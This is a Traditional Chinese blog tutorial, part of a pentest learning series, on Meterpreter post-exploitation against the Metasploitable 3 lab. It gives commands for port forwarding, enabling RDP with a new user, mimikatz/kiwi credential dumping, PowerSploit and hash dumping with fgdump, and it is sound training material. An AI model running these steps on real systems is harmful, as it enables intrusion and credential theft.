iT邦幫忙

2021 iThome 鐵人賽

DAY 26
0
Security

資安這條路─系統化學習滲透測試系列 第 26

Day26 - 針對 Metasploitable 3 進行滲透測試(7) - 利用 Meterpreter 後滲透

  • 分享至 

  • xImage
  •  

何謂後滲透

當惡意攻擊者入侵企業之後,會從第一台入口點開始往內部進行攻擊,有些企業會使用 Windows AD 進行權限控管,因此線在對於 Windwos AD 的安全性也很重要。

演練情境

接續昨天的情境,第一台入口機器被植入 Meterpreter 後門之後,可以用那些指令進行後滲透。

  1. use post/multi/manage/shell_to_meterpreter
    設定工具
  2. set session 1
    設定 session
  3. run
    執行升級 shell

實驗期間有可能會有 shell 不穩的狀態,多嘗試幾次!

轉發端口

當受害主機可能開啟了 RDP (遠端桌面)但因為防火牆阻擋或其他原因,導致無法連到受害主機,因此可以將受害主機的 port 轉發到攻擊主機,直接存取攻擊主機的轉發過來的 port 就可以連接到受害主機的 port,我們透過指令 portfwd 進行測試。

轉發指定端口
portfwd add -l 3389 -p 3389 -r [target]

參數 說明
-l 監聽的 port
-p 受害主機的 port
-r 受害主機IP

確認目前已經轉發的 port
portfwd list

確認攻擊主機是否有監聽 3389
netstat -antup

安裝 rdesktop
sudo apt install rdesktop

進行本地連線
rdesktop 127.0.0.1:3389

主要連線連到本機(127.0.0.1)的 3389 port,但因為 port 已經轉發到受害主機的 3389,因此連線畫面其實是受害主機的連線畫面。

刪除轉發的 port
portfwd delete -l 3389 -p 3389 -r [target]

一次刪除所有 portfwd
portfwd flush

後滲透:開啟遠端桌面

  1. 先跳轉到管理者權限,利用 ps 查看目前有管理者權限的 process
    ps
  2. 鎖定 PID 484 利用 migrate <PID> 合併,可以用 getuid 確認
  3. 輸入background,並且查看 sessions 確認自己已經提權到 SYSTEM
  4. 使用
    use post/windows/mange/enable_rdp


5. 設定參數
set username feifei
set password feitest
set session 1
run

  1. 可以利用之前 portfwd 的方式,RDP 登入

Mimikatz

load mimikatz
因為現在 mimikatz 已經合併,因此直接使用 load kiwi

查看所有帳號密碼
creds_all

查看所有 kerberos 密碼
creds_kerberos

查看所有 msv 密碼
creds_msv

查看所有 wdigest 密碼
creds_wdigest

查看版本
kiwi_cmd version

使用 mimikatz 的指令
kiwi_cmd <mimikatz模組>

kiwi_cmd ::
查看 mimikatz 的模組

查看 sekurlsa 模組
kiwi_cmd sekurlsa::

使用 sekurlsa 中的 msv 指令
kiwi_cmd sekurlsa::msv

powershell

load powershell

  1. powershell_execute 執行 powershell 指令
  2. powershell_import 引用其他工具
  3. powershell_shell 直接進行互動

powershell_execute "$PSVersionTable"

下載後滲透工具
git clone https://github.com/PowerShellMafia/PowerSploit

確認我們需要的工具

** import 指定工具**
將工具 load 進去
powershell_import "/home/user/PowerSploit/Recon/PowerView.ps1"

powershell_execute Get-NetLoggedon

可直接使用 powershell 互動
powershell_shell
$PSVersionTable

hashdump

hashdump

fgdump.exe

檔案:https://github.com/interference-security/kali-windows-binaries/blob/master/fgdump/fgdump.exe

將這個 exe 下載到家目錄。

上傳 fgdump.exe 到受害主機
upload /home/user/fgdump.exe C:\\

進入 shell 模式
shell

切換到 C
cd ..
cd ..

執行 fgdump.exe
fgdump.exe

確認檔案名稱
dir
127.0.0.1pwdump

查看 hash
type 127.0.0.1pwdump

下載指定檔案
download 127.0.0.1pwdump

使用 rockyou 字典檔爆破密碼


上一篇
Day25 - 針對 Metasploitable 3 進行滲透測試(6) - 使用 Meterpreter
下一篇
Day27 - Linux 提權(1)
系列文
資安這條路─系統化學習滲透測試37
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言